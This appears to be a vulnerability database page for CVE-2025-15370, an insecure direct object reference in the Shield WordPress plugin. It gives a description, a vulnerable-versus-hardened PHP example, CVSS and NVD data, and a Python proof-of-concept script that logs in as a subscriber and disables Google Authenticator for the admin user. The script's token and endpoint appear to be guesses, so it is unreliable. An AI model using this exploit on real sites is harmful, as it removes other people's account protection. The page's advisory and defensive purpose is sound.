Security Vulnerability Report
CVE-2025-15370 CVSS 4.3 MEDIUM

CVE-2025-15370

Published: 2026-01-16 05:16:13
Last Modified: 2026-04-15 00:35:42

Description

The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user.
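The defect the description names is CWE-639: an action handler trusts the user ID it is given instead of checking that the caller may act on that account. The following added example (not the plugin's own code; the action name, function names and the meta key `example_gauth_enabled` are hypothetical) shows that pattern as a WordPress AJAX handler beside a hardened form that resolves the acting user server-side and requires `edit_user` on any other target.

```php
<?php
// Added example, not the plugin's code. Handler, action name and the
// meta key 'example_gauth_enabled' are hypothetical.

// VULNERABLE pattern (CWE-639): the target user comes straight from the
// request, so any logged-in user can turn off MFA for any other account.
function example_mfa_toggle_vulnerable() {
    check_ajax_referer('example_mfa_toggle', 'security');
    $user_id = absint($_POST['user_id'] ?? 0);   // attacker-controlled key
    delete_user_meta($user_id, 'example_gauth_enabled');
    wp_send_json_success(['user_id' => $user_id]);
}

// HARDENED form: the nonce only proves the request came from a logged-in
// session; authorization for the *target* account is a separate check.
function example_mfa_toggle_hardened() {
    check_ajax_referer('example_mfa_toggle', 'security');
    $target = example_authorized_mfa_target(absint($_POST['user_id'] ?? 0));
    if ($target === null) {
        wp_send_json_error(['message' => 'not allowed'], 403); // calls wp_die()
    }
    delete_user_meta($target, 'example_gauth_enabled');
    wp_send_json_success(['user_id' => $target]);
}

// Returns the user ID the caller may act on, or null when the request
// names another account the caller is not permitted to manage.
function example_authorized_mfa_target(int $requested): ?int {
    $self = get_current_user_id();
    if ($self === 0) {
        return null;                       // no authenticated session
    }
    if ($requested === 0 || $requested === $self) {
        return $self;                      // acting on one's own account only
    }
    // Any other target requires the edit_user capability for that user,
    // which Subscriber-level accounts do not hold.
    return current_user_can('edit_user', $requested) ? $requested : null;
}

add_action('wp_ajax_example_mfa_toggle', 'example_mfa_toggle_hardened');
```

For detection, the same check gives a log point: a request whose `user_id` differs from the session user and fails the capability test is worth recording with both IDs and the source address.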

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Shield Security Plugin < 21.0.9 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import re

# CVE-2025-15370 PoC - IDOR in WordPress Shield Plugin
# Target: WordPress site with Shield Security Plugin <= 21.0.9
# Vulnerability: Authenticated users can disable Google Authenticator for any user

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_USERNAME = "attacker_user"
ATTACKER_PASSWORD = "attacker_password"
TARGET_USER_ID = 1  # Usually admin user ID


def get_nonce_and_cookie():
    """Login as subscriber and get necessary tokens"""
    session = requests.Session()

    # Get login page to extract nonce
    login_page = session.get(f"{TARGET_URL}/wp-login.php")

    # Extract security nonce from login form
    nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', login_page.text)
    if not nonce_match:
        print("[-] Failed to extract nonce")
        return None, None
    nonce = nonce_match.group(1)

    # Login as low-privilege subscriber user
    login_data = {
        'log': ATTACKER_USERNAME,
        'pwd': ATTACKER_PASSWORD,
        'wp-submit': 'Log In',
        '_wpnonce': nonce,
        'redirect_to': f"{TARGET_URL}/wp-admin/",
    }
    session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

    # WordPress names the auth cookie wordpress_logged_in_<hash>, so match on the prefix
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.get_dict()):
        print("[-] Login failed")
        return None, None

    print("[+] Login successful as subscriber")
    return session.cookies.get_dict(), session


def exploit_idor(cookies, session):
    """Exploit IDOR to disable Google Authenticator for target user"""
    # The vulnerable endpoint is typically:
    # /wp-admin/admin-ajax.php
    # Action: mfa_google_auth_toggle
    exploit_data = {
        'action': 'mfa_google_auth_toggle',
        'sub_action': 'disable',
        'user_id': TARGET_USER_ID,  # IDOR: Attacker can specify any user
        'security': 'dummy_security_token',  # May need valid token
    }
    response = session.post(
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        data=exploit_data,
        cookies=cookies,
    )
    if response.status_code == 200:
        print(f"[+] Exploit sent - Target user_id: {TARGET_USER_ID}")
        print(f"[+] Response: {response.text}")
        return True
    return False


def main():
    print("[*] CVE-2025-15370 PoC - WordPress Shield Plugin IDOR")
    print("[*] Target: Disable Google Authenticator for any user")
    cookies, session = get_nonce_and_cookie()
    if not cookies:
        return
    exploit_idor(cookies, session)
    print("[*] Check if target user's Google Authenticator is disabled")


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/browser/wp-simple-firewall/tags/21.0.8/src/lib/src/ActionRouter/Actions/MfaGoogleAuthToggle.php
https://plugins.trac.wordpress.org/changeset/3438647/wp-simple-firewall
https://www.wordfence.com/threat-intel/vulnerabilities/id/d777014a-5397-4062-af39-7ea86589a0d0?source=cve

Raw JSON Data

JSON

{
  "cve": {
    "id": "CVE-2025-15370",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-16T05:16:12.717",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Shield: Blocks Bots, Protects Users, and Prevents Security Breaches plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 21.0.9 via the MfaGoogleAuthToggle class due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to disable Google Authenticator for any user."
      },
      {
        "lang": "es",
        "value": "El Shield: Bloquea Bots, Protege Usuarios y Previene Brechas de Seguridad plugin para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 21.0.9, inclusive, a través de la clase MfaGoogleAuthToggle debido a la falta de validación en una clave controlada por el usuario. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, deshabiliten Google Authenticator para cualquier usuario."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wp-simple-firewall/tags/21.0.8/src/lib/src/ActionRouter/Actions/MfaGoogleAuthToggle.php",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3438647/wp-simple-firewall",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d777014a-5397-4062-af39-7ea86589a0d0?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}